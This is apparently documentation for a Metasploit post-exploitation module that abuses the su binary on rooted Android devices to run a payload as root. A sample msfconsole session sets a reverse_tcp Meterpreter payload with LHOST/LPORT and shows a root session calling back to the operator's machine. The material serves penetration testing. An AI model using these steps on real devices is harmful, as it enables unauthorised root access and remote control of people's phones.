## Vulnerable Application

This module uses the su binary present on rooted devices to run a payload as root.

A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
temporary directory, make it executable, execute it in the background, and finally delete the executable.

On most devices the su binary will pop-up a prompt on the device asking the user for permission.

This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
Many devices can be rooted by flashing new firmware, however the existing data will be lost.

## Scenarios

You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)

Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
An example session follows:

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                        Information         Connection
  --  ----  ----                        -----------         ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf5 exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf5 exploit(android/local/su_exec) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.

```

Please not that in most cases you will have to manually confirm the Superuser prompt 
on the device itself before the module completes. You can do `set WfsDelay 10` to
give yourself more time.